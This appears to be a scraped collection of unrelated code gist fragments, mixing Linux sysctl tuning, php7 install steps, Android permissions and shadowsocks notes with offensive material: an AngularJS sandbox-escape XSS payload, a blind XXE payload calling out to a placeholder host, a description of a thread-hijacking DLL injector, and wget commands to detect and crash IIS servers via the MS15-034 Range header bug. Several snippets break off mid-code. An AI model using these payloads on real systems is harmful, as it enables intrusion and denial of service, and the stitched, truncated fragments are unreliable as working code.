Francisco Javier DLG PacodiazDG

LInux

Three system configuration parameters must be set to support a large number of open files and TCP connections with large bursts of messages. Changes can be made using the /etc/rc.d/rc.local or /etc/sysctl.conf script to preserve changes after reboot.

1. /proc/sys/fs/file-max: The maximum number of concurrently open files.

fs.file-max = 1000000

2. /proc/sys/net/ipv4/tcp_max_syn_backlog: Maximum number of remembered connection requests, which are still did not receive an acknowledgment from connecting client. The default value is 1024 for systems with more than 128Mb of memory, and 128 for low memory machines.

net.ipv4.tcp_max_syn_backlog = 3240000

3. /proc/sys/net/core/somaxconn: Limit of socket listen() backlog, known in userspace as SOMAXCONN. Defaults to 128.

net.core.somaxconn = 3240000

This program can injects DLL into running processes using thread hijacking. No remote thread is created, only existing thread is used for injection.

The injector injects shellcode into the target process, and then a running thread in the target process is hijacked to execute the injected code. The injected code calls the LoadLibrary function to load the DLL.

Usage: ZwInjector [PID] [DLL name]

Install php7.0-fpm

# remove php5 modules
apt-get autoremove --purge php5-*
# add php-7.0 source list by [Ondřej Surý](https://github.com/oerdnj)
add-apt-repository ppa:ondrej/php
# Update index
apt-get update
# Install php7.0-fpm with needed extensions

#Angular Sandbox Escapes Cheatsheet

Source: XSS without HTML: Client-Side Template Injection with AngularJS

1.0.1 - 1.1.5 Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

	__author__ = 'uva'
	import socket

	sock = socket.socket()
	data = raw_input()
	try:
	sock.connect(('localhost', 9999), )
	sock.sendall(data + '\n')
	received = sock.recv(1024)
	except Exception as e:

	package main

	import (
	"fmt"
	"github.com/gorilla/mux"
	"github.com/gorilla/securecookie"
	"net/http"
	)

	// cookie handling

	// permissions list
	<uses-permission android:name="android.permission.BLUETOOTH" />
	<uses-permission android:name="android.permission.READ_PHONE_STATE" />
	<uses-permission android:name="android.permission.INTERNET" />
	<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
	<uses-permission android:name="android.permission.WAKE_LOCK" />
	<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
	<uses-permission android:name="android.permission.READ_PHONE_STATE" />
	<uses-permission android:name="android.permission.VIBRATE"/>
	<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>

	good, 你已经有了一个自己的shadowsocks代理了，现在想要把这个代理公布出去给所有人分享。
	但是没有两个小时，代理就没法使用了，为什么？因为你需要额外注意以下事项（以下步骤需要比较高的linux技能）
	本文只关注于确保shadowsocks服务还“活着”，如果你希望让其跑得更快，请参考
	https://github.com/clowwindy/shadowsocks/wiki/Optimizing-Shadowsocks

	1、 shadowsocks的timeout设置
	超时时间越长，连接被保持得也就越长，导致并发的tcp的连接数也就越多。对于公共代理，这个值应该调整得小一些。推荐60秒。

	2、检查操作系统的各种限制
	对于openvz的vps，特别需要检查一下

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	#Use this just to test (Requested Range Not Satisfiable = vulnerable):
	wget --header="Range: bytes=0-18446744073709551615" http://serveraddress/iis-85.png
	#Use this to BSOD Vulnerable systems:
	wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png